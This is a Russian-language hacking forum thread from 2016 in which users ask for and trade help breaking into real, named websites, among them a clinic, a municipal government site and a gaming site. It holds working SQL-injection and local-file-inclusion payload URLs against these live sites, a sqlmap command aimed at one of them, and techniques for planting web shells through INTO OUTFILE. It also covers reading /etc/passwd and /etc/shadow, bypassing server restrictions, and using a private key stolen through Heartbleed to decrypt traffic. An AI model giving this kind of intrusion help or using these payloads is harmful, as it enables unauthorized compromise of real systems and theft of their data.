[+] Resolved prepare_kernel_cred to 0xffffffff81064657

[+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map)

[+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map)

[+] Resolved mark_rodata_ro to 0xffffffff8102dc73

[+] Resolved set_kernel_text_ro to 0xffffffff8102dc41

[+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e

[+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2

[-] System rejected creation of perf event.

XAMEHA
22.02.2016, 02:13
z0mbie866 said:
↑ (https://antichat.live/posts/3954937/)
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?


Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п.

Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.

Waki
01.03.2016, 07:51
Есть postgres с такими правами


Code:

postgres (administrator) [3]:
privilege: catupd
privilege: createdb
privilege: super



Code:
boolean-based blind
Vector: OR NOT [INFERENCE]

Пробовал это https://rdot.org/forum/showthread.php?t=24

Но не проходит стакед запрос, как можно залиться?

anon457
01.03.2016, 16:05
Привет всем!

Наверно банальный вопрос, но все же спрошу, не против если отправите в нужное направление ). OpenVAS показывает уязвимость Format String on HTTP header value на нестандартном порту (8443) веб-сервера для Cisco UCM. Похожая "уязвимость" находится во многих продуктах, не только Cisco. Ниже вывод OpenVAS:

The remote web server seems to be vulnerable to a format string attack

on HTTP 1.0 header value.

An attacker might use this flaw to make it crash or even execute

arbitrary code on this host.

CVSS Base Score: 6.9

Family name: Gain a shell remotely

Category: destructive_attack

Это реально можно как-то использовать?

Dr.Strangelove
05.03.2016, 18:45
Ситуация такая. Был у меня давний шелл на одном сайте. Недавно сайт вместе с шеллом перенесли на новый сервер. Итого имеем:

Server software: Apache

Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen,sh ow_source,apache_child_terminate,apache_get_module s,apache_get_version,apache_getenv,apache_note,apa che_setenv,posix_kill,posix_mkfifo,posix_setpgid,p osix_setsid,posix_setuid,posix_getpwuid,posix_unam e,pclose,dl,disk_free_space,diskfreespace,disk_tot al_space,pcntl_exec,proc_close,proc_get_status,pro c_nice,proc_terminate,symlink,link

cURL support: enabled

Supported databases: MySql (5.5.47)

Но это еще не все. Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются.

Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?

Грабитель
07.03.2016, 01:27
Парни, подскажите по одной непростой SQL иньекции:

http://www.profclinic.ru/search/?search_string=[rand]'

Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.

Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).

Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.

Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.

Грабитель
07.03.2016, 01:30
Dr.Strangelove said:
↑ (https://antichat.live/posts/3960248/)
Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются.
Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?


selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.

BabaDook
07.03.2016, 01:48
Грабитель said:
↑ (https://antichat.live/posts/3960673/)
Парни, подскажите по одной непростой SQL иньекции:
http://www.profclinic.ru/search/?search_string=[rand]
'
Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.
Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).
Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.
Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.


Точно там есть уязвимость

http://www.profclinic.ru/search/?search_string (http://www.profclinic.ru/search/?search_string=[rand])=тут передаётся строка, то что вы вбили в поиск на Index.php

Грабитель
07.03.2016, 02:00
BabaDook да действительно... уязвимость есть...

Вопрос мой не об этом. Если сможете помочь найти рабочий вектр раскрутки, очень поможете.

Dr.Strangelove
08.03.2016, 00:26
Грабитель said:
↑ (https://antichat.live/posts/3960674/)
selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.


Да! Уже понял, что selinux или apparmor (особенно учитывая что ось убунта). Имеющиеся php-файлы редактировать не могу. Полный запрет на запись php файлов при наличии прав на запись. Перловые скрипты не выполняются. Питон еще конечно попробую, но крайне мало вероятно.

t0ma5
09.03.2016, 21:46
Dr.Strangelove said:
↑ (https://antichat.live/posts/3961004/)
Да! Уже понял, что selinux или apparmor (особенно учитывая что ось убунта). Имеющиеся php-файлы редактировать не могу. Полный запрет на запись php файлов при наличии прав на запись. Перловые скрипты не выполняются. Питон еще конечно попробую, но крайне мало вероятно.


хм то есть шелл какой никакой есть?

сессии то апач куда то пишет, ну конечно это могут быть всякие редисы, но может и файлы, тогда в файл сессии можно записать что нужно, а потом проинклудить, может нужно найти диру доступную для записи( типа /tmp ), то есть на диры сайта может и стоят 777, но вполне возможен какой нибудь chattr +i и ппц

php работает как модуль или cgi? неплохо было бы скидывать phpinfo в таких случаях хотя бы. обходить disable_functions пробовали?

t0ma5
10.03.2016, 16:14
Грабитель said:
↑ (https://antichat.live/posts/3960673/)
Парни, подскажите по одной непростой SQL иньекции:
http://www.profclinic.ru/search/?search_string=[rand]
'
Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.
Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).
Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.
Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.


результат запроса видимо кешируется, поэтому при повторной обращении с таким же запросом скули нет

в sqlmap есть макрос для рандомизации параметра

python sqlmap.py -u 'http://www.profclinic.ru/search/?search_string=1234567890qwertyuiopasdfghjklzxcvbn m' --randomize=search_string

рандомить он будет из символов "1234567890qwertyuiopasdfghjklzxcvbnm", можно указать другие если нужно

мда пробел и запятая фильтруется, вместо некоторых спецсимволов и вовсе подставляется знак %

валидный запрос удалось составить, но данные как извлечь не придумал

http://www.profclinic.ru/search/?se...2cczxceferg555dfwergtwevvvttr')||(select(1)) # (http://www.profclinic.ru/search/?search_string=tetrrzzr2342cczxceferg555dfwergtwev vvttr%27)||(select(1))%23)

1pman
10.03.2016, 21:00
ребят, нужна помощ.

Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?

Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов

t0ma5
11.03.2016, 14:04
1pman said:
↑ (https://antichat.live/posts/3961851/)
ребят, нужна помощ.
Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?
Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов


так проблема в нахождении диры доступной на запись или в ограничении в 8 символов?

вообще если есть одна скуля, то скорее всего есть и другая это в плане ограничений

на счет диры рекомендую пройтись хотя бы каким нибудь сканером, тем же nikto например https://cirt.net/Nikto2 и попробовать залить в найденные диры

blackbox
11.03.2016, 17:51
1pman said:
↑ (https://antichat.live/posts/3961851/)
ребят, нужна помощ.
Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?
Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов


Я не особо понял в чем проблема. В любом случае в sqlmap можно указывать путь куда загружать шелл если задаешь параметр --os-shell (sqlmap сам предлагает ввести каталог). По поводу формы логина: там в html стоит ограничение на 8 символов или в скрипте? HTML можно в любом случае поправить если надо и убрать ограничения. Hope it helps.

1pman
12.03.2016, 06:20
t0ma5 said:
↑ (https://antichat.live/posts/3962036/)
так проблема в нахождении диры доступной на запись или в ограничении в 8 символов?
вообще если есть одна скуля, то скорее всего есть и другая
это в плане ограничений
на счет диры рекомендую пройтись хотя бы каким нибудь сканером, тем же nikto например
https://cirt.net/Nikto2
и попробовать залить в найденные диры




blackbox said:
↑ (https://antichat.live/posts/3962124/)
Я не особо понял в чем проблема. В любом случае в sqlmap можно указывать путь куда загружать шелл если задаешь параметр --os-shell (sqlmap сам предлагает ввести каталог). По поводу формы логина: там в html стоит ограничение на 8 символов или в скрипте? HTML можно в любом случае поправить если надо и убрать ограничения. Hope it helps.


Диру открытую для записи я нашёл, даже несколько. ладно, фиг с ним, что скульмапа мне не предлагает самому указать путь куда заливать.

Я пошёл другим путём, решил залить его через --sql-shell и тут возникла проблема:


[WARNING] execution of custom SQL queries is only available when stacked queries are supported (я как понял, такие сложные запросы он не поддерживает или что?)
sql-shell> select user from mysql.user where file_priv='Y'
[05:08:20] [INFO] fetching SQL SELECT statement query output: 'select user from mysql.user where file_priv='Y''
[05:08:20] [INFO] the SQL query used returns 2 entries
[05:08:20] [INFO] resumed: root
[05:08:20] [INFO] resumed: root
select user from mysql.user where file_priv='Y' [1]:
root


Вообще все привилегии у пользователя есть исходя из --priv, попытался прочесть хоть какой-нибудь файл, а он мне выдает пустые в ответ. Нашёл другой сайт, такая же беда. Оба на линьке работают, может они настроены таким образом? вообще уже не знаю в какую сторону копать

Так же пробовал руками , при чтении файла пустая страница, все диры перебрал

sinise
12.03.2016, 10:50
Приветствую камрады.

На сайте есть форма для загрузки аватара, на вход принимает любой файл, но если загрузить php и попробовать его выполнить (даже пустой php файл), то выдает 500 External server error.

Сайт на Yii 2.0.5, имя вебшелла (и любого файла) кодируется md5+время, поэтому создать файл .htaccess (чтобы дать выполнение php или в html php кода) нет возможности. Если загрузить вебшелл без расширения, то содержимое просто выводиться на экран.

Пробовал загрузить jpg с прописанным в exif php кодом, не выполняется.

Подскажите какие варианты можно попробовать еще.

.SpoilerTarget" type="button">Spoiler: Код обработки загрузки аватара
public function upload()

{

if ($this->validate()) {

$avatarName = hash('md5', $this->avatar->baseName.''.time());

$this->avatar->saveAs('uploads/avatar/' . $avatarName . '.' . $this->avatar->extension);

$this->avatar = $avatarName.'.'.$this->avatar->extension;

return true;

} else {

return false;

}

}

blackbox
12.03.2016, 11:21
Файл не записывается даже руками? Если обратится к нему через веб то файл не существует? Когда файлы вручную читаете то хексовое имя используете load_file(0x2f6574632f706173737764)? С таким в общем-то никогда не сталкивался, поэтому не знаю что сказать. Нужно проверить чтобы дира действительна была доступна на запись. Бывает еще что из-за настроек безопасности типа apparmor mysqld запрещено писать в каталоги кроме разрешенных (типа /var/tmp) и директория вроде бы доступна на запись, но файл там базой создать нельзя. Поэтому такая инъекция годится либо того чтобы из базы добыть логин:хеш и в админку заиметь доступ, либо в паре с каким-нибудь LFI.

1pman
12.03.2016, 16:34
возможно и правда из за настроек безопасности, ибо другие сайты с такой проблемой крутились на винде, либо домашнем пк, а тут они вообще пытались сами править код, но полностью не смогли убрать инъекцию и крутятся уже на норм хостингах. вычитал на забугорных форумах , упоминали как то тоже самое про безопасность. в общем вечером ещё смотреть буду...

если что- то получится, отпишусь.

Saint-Sky
12.03.2016, 18:33
1pman said:
↑ (https://antichat.live/posts/3962427/)
возможно и правда из за настроек безопасности, ибо другие сайты с такой проблемой крутились на винде, либо домашнем пк, а тут они вообще пытались сами править код, но полностью не смогли убрать инъекцию и крутятся уже на норм хостингах. вычитал на забугорных форумах , упоминали как то тоже самое про безопасность. в общем вечером ещё смотреть буду...
если что- то получится, отпишусь.


Для стандартной записи файла через скулю(SELECT код_шелла_в_HEX_или_в_кавычка FROM mysql.user INTO OUTFILE '/путь/файл') обязательно кавычки файла не должны фильтроваться(magic_quotes_* в PHP). Также возможно, что пути относительные, chroot или виндовые. Первым делом пробуйте прочитать файлы руками с кавычками и через hex, например load_file(0x2f6574632f706173737764) и load_file('/etc/passwd') - если первый прочитается, а второй нет, то наверняка фильтруются кавычки и стандартом не залить...

EP025
13.03.2016, 14:57
Всем добрый день. Уже как день ломаю голову: изучаю обычное переполнение буффера со срывом стека и исполнением шеллкода. Шелл проверен на нескольких си-программах - рабочий, /bin/sh. Сделал все по правилам: nop-shellcode-esp. Так вот, при переполнении осуществляется перезапись eip адресом esp. Но при переходе на перезаписанный адрес, вылетает ошибка segmentation fault, eip указывает на тот самый буфер(не хочет выполняться даже первая nop-инструкция). Может быть нужно отключить какую-нибудь службу или я что-то неправильно делаю при подмене адреса?(про неработоспособность шелла не пишите, он работает на всех Си-програмах). Помогите пожалуйста. Ubuntu x86

xxl
16.03.2016, 05:50
Выручайте, не могу понять в чем дело. Вот сама скуля: http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99 and 1=(SeLecT+@@version)-- (http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99%20and%201=(SeLecT+@@vers ion)--) Сделал дамп таблиц и полей, но не могу слить ни одну запись из таблицы "JB_users".

(http://medtonnew.conceptsite.co.il/...top+1+user_pass+'::'+user_id+from+JB_users)-- (http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99+and+1=(select+top+1+user _pass%2b%27::%27%2buser_id+from+JB_users)--))

ghost8
25.03.2016, 21:26
sqlmap тебе в помощь он крутит,только что проверил.

RWD
25.03.2016, 23:39
SaNDER said:
↑ (https://antichat.live/posts/3966985/)
Нееее,в sqlmapу у меня на прокси жалуется,мол прокси нужно . Так что помоги как-нибудь по другому .


да нет там ничего, с чего вы взяли что там уязвимость?

.Light.
26.03.2016, 21:06
Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?

Zen1T21
26.03.2016, 22:51
.Light. said:
↑ (https://antichat.live/posts/3967233/)
Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?


Поищи phpmyadmin

RWD
27.03.2016, 12:37
http://peterking.si.com/p.php?act=Function

Кто знает что это и с чем его едят?

BabaDook
27.03.2016, 17:09
RWD said:
↑ (https://antichat.live/posts/3967389/)
http://peterking.si.com/p.php?act=Function
Кто знает что это и с чем его едят?


Очень похож на шел

RWD
27.03.2016, 17:53
BabaDook said:
↑ (https://antichat.live/posts/3967452/)
Очень похож на шел


у меня таких много, если кто может помочь разобраться скину еще.

t0ma5
28.03.2016, 13:26
RWD said:
↑ (https://antichat.live/posts/3966992/)
да нет там ничего, с чего вы взяли что там уязвимость?


была там скуль, натравили наверно стопитцот sqlmap'ов -_- , всё уже закрыли

децл лога осталось, не обычная кстати скуль была....


Code:
curl 'https://mixdrop.ru/?ref=100/*fff*/'
Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)
#0 [internal function]: Phalcon\Mvc\Model\Query->parse()
#1 [internal function]: Phalcon\Mvc\Model\Query->execute()
#2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...')
#3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...')
#4 [internal function]: GamesController->indexAction()
#5 [internal function]: Phalcon\Dispatcher->dispatch()
#6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#7 {main}

curl 'https://mixdrop.ru/?ref=90+or+user_id=a()'
SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist
#0 [internal function]: PDOStatement->execute()
#1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array)
#2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array)
#3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array)
#4 [internal function]: Phalcon\Mvc\Model\Query->execute()
#5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...')
#6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...')
#7 [internal function]: GamesController->indexAction()
#8 [internal function]: Phalcon\Dispatcher->dispatch()
#9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#10 {main}

t0ma5
28.03.2016, 14:06
BabaDook said:
↑ (https://antichat.live/posts/3967452/)
Очень похож на шел


очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно

сорцы если что https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php

BabaDook
28.03.2016, 14:30
t0ma5 said:
↑ (https://antichat.live/posts/3967758/)
очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно
сорцы если что
https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php


Я тоже н не нашёл, ну я там особо не глядел, там есть коннект к БД. И Возможно, скорее всего залиться через него варианта не будет. Это как бы техничиский монитор

Lazy
28.03.2016, 16:19
Закинул я шелл в upload : site.com/upload/shell

Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html

Сервер шелл не хочет открывать - такого файла у него нет .

Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.

Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .

Можно ли как-то победить rewrite или мертвый номер ?

t0ma5
28.03.2016, 17:00
Lazy said:
↑ (https://antichat.live/posts/3967812/)
Закинул я шелл в upload : site.com/upload/shell
Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html
Сервер шелл не хочет открывать - такого файла у него нет .
Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.
Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .
Можно ли как-то победить rewrite или мертвый номер ?


залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить

Lazy
28.03.2016, 17:49
Увы но htaccess никак не войдет .

Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .

t0ma5
28.03.2016, 17:59
хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен

надо глянуть в сорцы страницы с какой нить формой, что там?

MDen1s
30.03.2016, 17:37
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.

http://www.mogalakwena.gov.za/index.php?page=/etc/passwd (http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00)%00

http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ (http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00)%00

В последнем случае нет вывода (

BabaDook
30.03.2016, 17:43
MDen1s said:
↑ (https://antichat.live/posts/3968480/)
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.
http://www.mogalakwena.gov.za/index.php?page=/etc/passwd (http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00)
%00
http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ (http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00)
%00
В последнем случае нет вывода (


Файл недоступен

MDen1s
31.03.2016, 11:51
BabaDook said:
↑ (https://antichat.live/posts/3968482/)
Файл недоступен


А как-то можно проинклудить?

faza02
31.03.2016, 12:06
MDen1s said:
↑ (https://antichat.live/posts/3968701/)
А как-то можно проинклудить?


пробуйте другие способы, их огромное количество

BabaDook
31.03.2016, 13:00
1)


PHP:
http://www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index

2) инклудить сессию

3)


PHP:
http://www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00

что ещё можно придумать ?

I love this game
31.03.2016, 19:31
Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile

мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?

shell_c0de
31.03.2016, 19:44
https://translate.google.com/ в помощь

blackbox
31.03.2016, 20:21
I love this game said:
↑ (https://antichat.live/posts/3968861/)
Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile
мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "
Подскажите что можно еще придумать?


Попробуй в /tmp записать, возможно это проблема с правилами безопасности mysqld.

I love this game
31.03.2016, 21:36
blackbox said:
↑ (https://antichat.live/posts/3968886/)
Попробуй в /tmp записать, возможно это проблема с правилами безопасности mysqld.


в /tmp пишется

blackbox
31.03.2016, 21:43
I love this game said:
↑ (https://antichat.live/posts/3968916/)
в /tmp пишется


Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.

t0ma5
31.03.2016, 21:45
blackbox said:
↑ (https://antichat.live/posts/3968920/)
Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.


нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие

blackbox
31.03.2016, 21:52
t0ma5 said:
↑ (https://antichat.live/posts/3968922/)
нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие


Mysql не пишет в сущестувющие файлы, будет выдана ошибка.

RWD
31.03.2016, 21:57
Попался сайт, frontiercoop.com в строке поиска скуль, PostgreSQL но изза WAF не могу раскрутить. sql map тоже не берет, ругается на WAF

I love this game
31.03.2016, 22:17
А пасс от фтп,ssh или isp как-то можно прочитать?

blackbox
31.03.2016, 22:52
I love this game said:
↑ (https://antichat.live/posts/3968938/)
А пасс от фтп,ssh или isp как-то можно прочитать?


Да, файлы же читать можно с помощью LOAD_FILE() и LOAD DATA INFILE. Но опять же, если есть права на чтение этих файлов.

I love this game
31.03.2016, 23:13
А где хранятся пассы?

t0ma5
01.04.2016, 13:42
I love this game said:
↑ (https://antichat.live/posts/3968956/)
А где хранятся пассы?


в /etc/shadow

I love this game
01.04.2016, 14:32
t0ma5 said:
↑ (https://antichat.live/posts/3969102/)
в /etc/shadow


Сюда нет доступа (

Какие еще есть варианты, готов заплатить за помощь!

t0ma5
01.04.2016, 14:54
I love this game said:
↑ (https://antichat.live/posts/3969129/)
Сюда нет доступа (
Какие еще есть варианты, готов заплатить за помощь!


сорцы сайта можно читать? читай его

t0ma5
01.04.2016, 14:57
I love this game said:
↑ (https://antichat.live/posts/3969129/)
Сюда нет доступа (
Какие еще есть варианты, готов заплатить за помощь!


хватит хэкать, в соседнем топике суицид сиськи постит))

z0mbie866
02.04.2016, 12:50
Подскажите люди добрые.

Нашел heartbleed на одном сервере.

Восстановил RSA PRIVATE KEY с помощью утилиты heartleech.

На этом сертификате крутятся все поддомены сайта. Но они находятся на разных серваках.

Как можно перехватить весь чужой траффик https и расшифровывать с помощью приватного ключа. Доступ к сервакам не имею.

И вообще что можно сделать если у тебя имется приватный ключ?

MDen1s
03.04.2016, 03:04
http://www.sallatykka.com/web/index.php?id=21'+order+by+1 -- - (http://www.sallatykka.com/web/index.php?id=21%27+order+by+1%20--%20-)

Каким образом здесь можно получить вывод о количестве столбцов, если при order by 1 вылетает ошибка от mysql_fretch_array() ?

MDen1s
03.04.2016, 18:53
Есть инклуд, но не могу сделать RCE (

http://www.weidnermsmd.org/template.php?page=/var/log/nginx/access.log

pw0ned
06.04.2016, 23:30
SaNDER said:
↑ (https://antichat.live/posts/3970916/)
http://princessdisney.ru/index.php?...h1pass_recovery&auth_cn=Kiwi_Account_SelfAuth (http://princessdisney.ru/index.php?nid=Kiwi_Account_SelfAuth1pass_recovery&auth_cn=Kiwi_Account_SelfAuth)
просто кавычку подставил,и какая-то ошибка . Впервые такое вижу?Что это?


Ничего критичного )

semik
11.04.2016, 03:48
Комрады,подскажите, что можно выжать из ситуации:

запрос: www.site.com/search?searchword=lala (http://www.site.com/search?searchword=lala)"+AND+9815%3D8835

Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50

Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?

SQLmap не видит, что параметр уязвим.

faza02
11.04.2016, 04:11
semik said:
↑ (https://antichat.live/posts/3972480/)
Комрады,подскажите, что можно выжать из ситуации:
запрос:
www.site.com/search?searchword=lala (http://www.site.com/search?searchword=lala)
"+AND+9815%3D8835
Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50
Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?
SQLmap не видит, что параметр уязвим.


в 20 символов вектора не подобрать для вывода

semik
11.04.2016, 09:50
yarbabin said:
↑ (https://antichat.live/posts/3972481/)
в 20 символов вектора не подобрать для вывода


Спасибо, раскрутил через другой дырявый скрипт.

Bobrenz
12.04.2016, 07:17
добрый всем день, вопрос по раскрутке уязвимости через мап, при попытке получения содержимого таблиц получаю следующеее...

osca'

[00:14:33] [WARNING] the SQL query provided does not return any output

[00:14:33] [INFO] fetching columns for table 'ev_evento_participante' in databas

e 'biman_pontemosca'

[00:14:33] [WARNING] the SQL query provided does not return any output

[00:14:33] [INFO] fetching columns for table 'ev_evento_colaborador' in database

'biman_pontemosca'

[00:14:33] [WARNING] the SQL query provided does not return any output

